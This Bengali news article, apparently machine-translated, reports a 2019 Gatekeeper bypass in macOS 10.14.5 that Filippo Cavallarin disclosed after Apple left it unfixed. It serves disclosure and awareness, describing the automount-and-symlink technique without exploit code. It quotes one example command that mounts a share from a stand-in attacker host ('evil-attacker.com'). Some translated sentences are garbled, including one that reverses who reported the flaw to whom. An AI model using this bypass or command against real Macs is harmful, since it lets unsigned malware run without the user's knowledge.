ম্যাকে একটি দূষিত অ্যাপ ইনস্টল করা সহজ। তিন মাস পেরিয়ে গেলেও ত্রুটি সংশোধন করেনি অ্যাপল

27. 5. 2019

নিরাপত্তা গবেষক ফিলিপ্পো ক্যাভালারিন তার ব্লগে macOS 10.14.5 এ বাগ সম্পর্কে একটি সতর্কতা পোস্ট করেছেন। এটি গেটকিপারের নিরাপত্তা ব্যবস্থাকে সম্পূর্ণভাবে বাইপাস করার সম্ভাবনার মধ্যে রয়েছে। ক্যাভালারিনের মতে, তিনি এই বছরের ফেব্রুয়ারিতে ইতিমধ্যে অ্যাপলের কাছে ত্রুটিটি নির্দেশ করেছিলেন, কিন্তু কোম্পানি সর্বশেষ আপডেটে এটি ঠিক করেনি।

গেটকিপার অ্যাপল দ্বারা বিকশিত হয়েছিল এবং 2012 সালে প্রথমবারের মতো এটির ডেস্কটপ অপারেটিং সিস্টেমে অন্তর্ভুক্ত করা হয়েছিল৷ এটি এমন একটি প্রক্রিয়া যা ব্যবহারকারীর জ্ঞান এবং সম্মতি ছাড়াই একটি অ্যাপ্লিকেশনকে চলতে বাধা দেয়৷ আপনি একটি অ্যাপ ডাউনলোড করার পরে, সফ্টওয়্যারটি অ্যাপল দ্বারা সঠিকভাবে স্বাক্ষরিত কিনা তা দেখতে দারোয়ান স্বয়ংক্রিয়ভাবে তার কোডটি পরীক্ষা করে।

তার ব্লগ পোস্টে, ক্যাভালারিন বলেছেন যে গেটকিপার, ডিফল্টরূপে, বাহ্যিক স্টোরেজ এবং নেটওয়ার্ক শেয়ার উভয়কেই নিরাপদ অবস্থান বলে মনে করে। এই লক্ষ্যগুলির মধ্যে থাকা যে কোনও অ্যাপ্লিকেশন তাই গেটকিপার চেকের মাধ্যমে না গিয়ে স্বয়ংক্রিয়ভাবে চালু করা যেতে পারে। এই বৈশিষ্ট্যটি ব্যবহারকারীর অজান্তেই ক্ষতিকারক সফ্টওয়্যার চালু করার জন্য ব্যবহার করা যেতে পারে।

একটি দিক যা অননুমোদিত অ্যাক্সেসের অনুমতি দেয় তা হল অটোমাউন্ট বৈশিষ্ট্য, যা ব্যবহারকারীদের স্বয়ংক্রিয়ভাবে একটি নেটওয়ার্ক শেয়ার মাউন্ট করতে দেয় কেবলমাত্র "/net/" দিয়ে শুরু হওয়া একটি পথ নির্দিষ্ট করে। উদাহরণ হিসাবে, ক্যাভালারিন "ls /net/evil-attacker.com/sharedfolder/" পথটি উল্লেখ করেছেন যা অপারেটিং সিস্টেমকে একটি দূরবর্তী অবস্থানে একটি "শেয়ারফোল্ডার" ফোল্ডারের বিষয়বস্তু লোড করতে পারে যা সম্ভাব্য দূষিত হতে পারে।

আপনি ভিডিওতে হুমকিটি কীভাবে কাজ করে তা দেখতে পারেন:

আরেকটি কারণ হল যে অটোমাউন্ট ফাংশনের দিকে পরিচালিত একটি নির্দিষ্ট সিমলিংক ধারণকারী একটি জিপ সংরক্ষণাগার যদি ভাগ করা হয়, তবে এটি গেটকিপার দ্বারা চেক করা হবে না। এইভাবে, শিকার সহজেই দূষিত সংরক্ষণাগারটি ডাউনলোড করতে পারে এবং এটিকে আনজিপ করতে পারে, আক্রমণকারীকে ব্যবহারকারীর অজান্তেই ম্যাকে কার্যত যে কোনও সফ্টওয়্যার চালানোর অনুমতি দেয়৷ ফাইন্ডার, যা ডিফল্টরূপে নির্দিষ্ট এক্সটেনশন লুকিয়ে রাখে, এরও এই দুর্বলতার অংশ রয়েছে।

ক্যাভালারিন তার ব্লগে বলেছেন যে অ্যাপল এই বছরের 22 ফেব্রুয়ারি ম্যাকোস অপারেটিং সিস্টেমের দুর্বলতার দিকে দৃষ্টি আকর্ষণ করেছে। কিন্তু মে মাসের মাঝামাঝি সময়ে, অ্যাপল ক্যাভালারিনের সাথে যোগাযোগ বন্ধ করে দেয়, তাই ক্যাভালারিন পুরো বিষয়টি প্রকাশ করার সিদ্ধান্ত নেয়।

উৎস: এফসিভিএল

বিষয়: স্টোরেজ, স্বয়ংক্রিয়ভাবে, ম্যাক অপারেটিং সিস্টেম, ভিডিও, সেটিংস, ফাংশন, ব্যবহারকারী, অ্যাপলিকেস, আপেল

প্রবন্ধের আলোচনা

তোমার নাম

আপনার মন্তব্য

উপরের ডেটা পূরণ করে, আমি স্বীকার করছি যে কোম্পানি TEXT FACTORY s.r.o., Brno-এ নিবন্ধিত অফিস, Durďákova 336/29, Černá Pole, জিপ কোড: 613 00, ID নম্বর: 06157831, Brno, C বিভাগে আঞ্চলিক আদালতে নিবন্ধিত , 100399 সন্নিবেশ করান, অনুচ্ছেদ 6 অনুচ্ছেদ 1 চিঠি অনুসারে TEXT FACTORY s.r.o. এর বৈধ স্বার্থের ভিত্তিতে আমার দ্বারা পূরণ করা নিবন্ধন ফর্মে প্রদত্ত আমার ব্যক্তিগত ডেটা প্রক্রিয়া করবে f) জিডিপিআর এবং আইনি বাধ্যবাধকতাগুলি পূরণ করতে (অনুচ্ছেদ 6, অনুচ্ছেদ 1, চিঠি গ) জিডিপিআর), নিম্নলিখিত উদ্দেশ্যে: প্রকাশিত নিবন্ধগুলিতে বা আলোচনার মধ্যে সক্রিয়ভাবে অবদান রাখার জন্য টেক্সট ফ্যাক্টরি সংস্থা দ্বারা পরিচালিত ওয়েবসাইটগুলিতে দর্শকদের অনুমোদন নিশ্চিত করার প্রয়োজনীয়তা ফোরাম এবং এই আলোচনা ফোরামের প্রশাসক হিসাবে TEXT FACTORY s.r.o. এর অধিকার প্রয়োগ করা। ব্যক্তিগত তথ্য এবং অধিকার প্রক্রিয়াকরণ সম্পর্কে আরও তথ্য পাওয়া যাবে ব্যক্তিগত তথ্য সুরক্ষার বিষয়ে পাঠ. সম্পূর্ণ পাঠ্য

এটা হতে পারে তোমার আগ্রহ থাকতে পারে

সম্পর্কিত